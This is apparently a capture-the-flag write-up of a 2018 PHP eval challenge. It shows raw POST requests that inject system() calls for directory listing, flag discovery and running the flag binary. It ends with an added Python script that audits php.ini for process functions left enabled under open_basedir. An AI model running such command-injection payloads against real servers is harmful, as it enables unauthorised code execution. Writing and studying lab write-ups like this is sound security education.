Tags: web
Rating: 3.5
# ▼▼▼PHP Eval White-List (Web), 192/586 teams solved = 32.8%
**This writeup is written by [@kazkiti_ctf](https://twitter.com/kazkiti_ctf)**
```
PHP was dangerous, so we've fixed it!
http://c67f8ffd.quals2018.oooverflow.io
Files:websec_eval_wl.so
```
---
**【Understanding function and access restrictions】**
http://c67f8ffd.quals2018.oooverflow.io
↓
```
PHP - Custom eval whitelisting!
PHP is dangerous, so we wrote a custom php extension to improve its security. We're also taking advantage of the open_basedir directive to prevent you from accessing the flag binary up the current folder. You can check the source of the page here.
```
↓
The following access restrictions are in place:
```
・custom PHP extension: websec_eval_wl.so
・open_basedir directive
```
---
The source code is also provided:
↓
http://c67f8ffd.quals2018.oooverflow.io/source.txt
↓
```
<html>
<head>
<title>php as a service</title>
<link rel='stylesheet' href='bootstrap.min.css' />
</head>
<body>
<div id='main'>
<div class='container'>
<div class='row'>
<h1>PHP<small> - Custom eval
whitelisting!</small></h1>
</div>
<div class='row'>
PHP is dangerous, so we wrote a custom php extension to
improve its security. We're also taking advantage of the open_basedir
directive to prevent you from accessing the flag
binary up the current folder.
You can check the source of the page here.
<div class='container'>
./flag binary?';
}?>
```
↓
Arbitrary code can be executed:
`eval($_POST['d']);`
---
**【Information gathering by arbitrary code execution】**
```
POST / HTTP/1.1
Host: c67f8ffd.quals2018.oooverflow.io
Content-Type: application/x-www-form-urlencoded

d=system("ls -al");&submit=Run
```
↓
```
total 180
drwxr-xr-x 3 root root 4096 May 12 18:10 .
drwxr-xr-x 3 root root 4096 May 11 16:29 ..
-rw-r--r-- 1 root root 108376 May 5 04:58 bootstrap.min.css
-rw-r--r-- 1 root root 1672 May 12 18:09 index.php
-rw-r--r-- 1 root root 155 May 5 04:58 source.php
-rw-r--r-- 1 root root 1672 May 12 18:09 source.txt
d-wx-wx-wx 2 root root 16384 May 14 11:40 tmp
-rw-r--r-- 1 root root 33784 May 5 04:58 websec_eval_wl.so
```
↓
The `tmp` folder is writable, but I can exploit without using it.
---
**【Identify the location of flag】**
The top page has the following description:
`Can you execute the ./flag binary?`
---
I searched for an executable flag:

- × d= `system('file ./../../flag');` ⇒ `./../../flag: cannot open './../../flag' (No such file or directory)`
- ○ d= `system('file ./../flag');` ⇒ `./../flag: executable, regular file, no read permission`
- × d= `system('file ./flag');` ⇒ `./flag: cannot open './flag' (No such file or directory)`
- × d= `system('file ./tmp/flag');` ⇒ `./tmp/flag: ASCII text, with very long lines` ※This is a fake flag
---
**【exploit】**
d= `system(' ./../flag');`
↓
`OOO{Fortunately_php_has_some_rock_solid_defense_in_depth_mecanisms,_so-everything_is_fine.}`
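The last step works despite `open_basedir` because that directive only restricts PHP's own file functions, not the processes that `system()` starts. The following is an added example, not part of the original writeup or the challenge: a small configuration audit that reports process-launching functions left enabled when `open_basedir` is set. The sample `php.ini` contents and paths are constructed, and the parser assumes Unix-style values with no `;` inside them.

```python
# Added example: flag php.ini files that rely on open_basedir while still
# allowing PHP to start external processes (which open_basedir does not confine).

# PHP functions that launch external programs.
PROCESS_FUNCTIONS = ("system", "exec", "shell_exec", "passthru",
                     "popen", "proc_open", "pcntl_exec")

# Constructed sample: the weak setup described on this page (path is a placeholder).
WEAK_INI = """
[PHP]
; confine file access to the web root
open_basedir = /var/www/html
"""

# Constructed sample: same restriction, with process execution disabled as well.
HARDENED_INI = """
[PHP]
open_basedir = /var/www/html
disable_functions = system, exec, shell_exec, passthru, popen, proc_open, pcntl_exec
"""

def parse_ini(text):
    """Return {directive: value} for 'key = value' lines; ';' starts a comment."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line or line.startswith("[") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        settings[key.strip().lower()] = value.strip().strip('"')
    return settings

def unrestricted_process_functions(ini_text):
    """List process-launching functions still enabled although open_basedir is set."""
    settings = parse_ini(ini_text)
    if not settings.get("open_basedir"):
        return []  # no open_basedir in use, so nothing is being relied on
    disabled = {name.strip().lower()
                for name in settings.get("disable_functions", "").split(",")
                if name.strip()}
    return [name for name in PROCESS_FUNCTIONS if name not in disabled]

if __name__ == "__main__":
    print("weak:", unrestricted_process_functions(WEAK_INI))
    print("hardened:", unrestricted_process_functions(HARDENED_INI))
```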